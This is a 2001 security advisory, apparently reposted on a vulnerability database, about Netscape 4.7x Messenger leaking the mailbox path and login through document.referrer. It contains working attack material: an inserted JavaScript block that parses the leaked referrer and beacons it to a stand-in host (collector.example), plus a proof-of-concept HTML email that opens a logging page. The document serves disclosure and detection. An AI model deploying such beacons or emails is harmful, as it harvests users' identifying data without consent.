SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval

2001-06-05T00:00:00
ID SECURITYVULNS:DOC:1687
Type securityvulns
Reporter Securityvulns
Modified 2001-06-05T00:00:00

Description

Several known Netscape bugs can only be exploited with knowledge of where the user's files are located. The bug described here is not serious by itself, but it discloses that location.

Topic                    : Netscape 4.7x user information retrieval
Author                   : 3APA3A <3APA3A@security.nnov.ru>
Affected software        : Netscape 4.7x, all platforms
Vendor                   : Netscape (iPlanet)
Risk                     : Low
Remotely Exploitable     : Yes
Released                 : 30 May 2001
Vendor URL               : http://www.netscape.com
SECURITY.NNOV advisories : http://www.security.nnov.ru/advisories

Background:

Netscape Messenger uses an internal URI scheme called mailbox://. The format of a mailbox URI is

mailbox://full_path_to_user_folder?ID=some_message_id&number=somenumber

This URI contains the full path to the user's mailbox, which usually includes the user's login name and, on Windows 9x, the path to the Netscape installation. It is impossible to determine this location from JavaScript inside an e-mail message, because Netscape hides document.location from JavaScript.

Problem:

It is possible to retrieve the mailbox:// URI of a message, and hence the mailbox location, the user's system login and, in some cases, the path to the Netscape installation.

Details:

When a link is followed from a message, Netscape sets the document.referrer property of the target page to the mailbox:// URI of the message that contained the link. JavaScript on the target page can read this property and pass it to any location; the server that receives it also learns the IP address of the calling machine from the connection itself.
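The following is an added example, not code from the advisory or from the nsdemo.asp page, showing what the JavaScript on an attacker-controlled target page would do with the leaked referrer: parse the mailbox:// URI into the folder path and message parameters, guess the login from the profile path, and build the URL of a collector endpoint to ship it to. The mailbox:// layout follows the advisory's description; the sample URIs, the collector URL and the `Users`/`home` path convention used to guess the login are assumptions made for illustration.

```javascript
// Added example (not part of the SECURITY.NNOV advisory or of Netscape's code).
// Parse a mailbox:// URI of the form described in the advisory:
//   mailbox://full_path_to_user_folder?ID=some_message_id&number=somenumber
// Returns null for anything that is not a mailbox:// URI (e.g. an http referrer,
// or an empty string when the page was not opened from Messenger).
function parseMailboxUri(uri) {
  const m = /^mailbox:\/\/([^?]*)(?:\?(.*))?$/i.exec(uri || '');
  if (!m) return null;
  // Assumption: old Netscape builds encode the Windows drive colon as "|" (C|/...),
  // so normalise that back to "C:/..." for readability.
  const path = decodeURIComponent(m[1]).replace(/^([A-Za-z])\|/, '$1:');
  const params = {};
  for (const pair of (m[2] || '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const val = eq < 0 ? '' : pair.slice(eq + 1);
    params[decodeURIComponent(key).toLowerCase()] = decodeURIComponent(val);
  }
  return { path: path, id: params.id || null, number: params.number || null };
}

// Guess the system login from the profile path. Assumption: the profile directory
// sits under ".../Users/<name>/" (Windows) or "/home/<name>/" (Unix) and the
// profile name equals the login, as the advisory says is usually the case.
function guessLogin(path) {
  const parts = path.split('/').filter(Boolean);
  for (let i = 0; i < parts.length - 1; i++) {
    if (/^(users|home)$/i.test(parts[i])) return parts[i + 1];
  }
  return null;
}

// Build the beacon URL the target page would request. The collector already sees
// the client IP on the TCP connection, so only the leaked data goes in the query.
function buildBeaconUrl(collector, referrer) {
  const info = parseMailboxUri(referrer);
  if (!info) return null;
  return collector +
    '?path=' + encodeURIComponent(info.path) +
    '&login=' + encodeURIComponent(guessLogin(info.path) || '') +
    '&id=' + encodeURIComponent(info.id || '') +
    '&number=' + encodeURIComponent(info.number || '');
}

// In the browser this is the whole "exploit": read the referrer and fire the beacon.
// (Hypothetical collector URL; constructed for the example.)
if (typeof document !== 'undefined' && typeof Image !== 'undefined') {
  const beacon = buildBeaconUrl('http://collector.example/log', document.referrer);
  if (beacon) new Image().src = beacon;
}

// Constructed sample referrers, one per platform, for offline use.
const SAMPLE_WINDOWS = 'mailbox://C|/Program%20Files/Netscape/Users/jsmith/Mail/Inbox?ID=3A1B2C%40host&number=17';
const SAMPLE_UNIX = 'mailbox:///home/vasya/nsmail/Inbox?ID=3A1B2D%40host&number=2';
```

The same referrer parsing can be run server-side over web server access logs to check whether any visitor arrived with a mailbox:// Referer, which is the simplest way to tell that a page is being reached from Messenger-rendered mail.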

Exploitation:

If you read this message in Netscape Messenger, simply click the link http://www.security.nnov.ru/files/nsdemo.asp to see your mailbox location. Alternatively, a Netscape user can be forced to open that page with a message like this:

-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html

<html><script>
window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
</script>
<A HREF="http://www.security.nnov.ru/files/nsdemo.asp">
http://www.security.nnov.ru/files/nsdemo.asp
</A>
</html>
-=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted on May 30, 2001 via http://help.netscape.com/forms/bug-security.html. No feedback was given.

--
http://www.security.nnov.ru           /\_/\
                                     { . . }     |\
+--oQQo->{ ^ }<-----+ \
|  3APA3A   U  3APA3A   }
+-------------o66o--+ /
                      |/
You know my name - look up my number (The Beatles)